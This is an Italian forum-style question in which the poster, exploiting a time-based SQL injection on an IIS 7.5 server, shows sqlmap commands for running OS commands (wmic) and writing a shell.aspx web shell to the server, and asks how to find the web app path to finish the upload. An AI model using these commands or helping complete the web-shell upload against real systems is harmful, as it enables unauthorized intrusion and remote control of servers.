Ho a che fare con un SQLi basato sul tempo in un server Microsoft IIS 7.5 e voglio caricare una shell.
Il mio approccio è ottenere il percorso dell'applicazione interna, quindi provare a caricare un file con sqlmap --file-write "shell.aspx" --file-dest "C:/<The Web APP Path>" .
Sto cercando di ottenere il percorso con - >
sqlmap -u <url> --random-agent --no-escape --dbms=mssql --time-sec=9 --os-cmd="wmic process where name='w3wp.exe' get ExecutablePath
Ma ottengo la risposta:
No instances ,
In modo che mi renda conto che il processo IIS non è in esecuzione lì, poiché w3wp.exe è il nome del processo IIS. Questo mi avrebbe dato il percorso eseguibile, non il percorso dell'app, però, non so come ottenerlo.
Come utilizzeresti questo scenario e riuscirai a caricare una shell? (Sono DBA tra l'altro)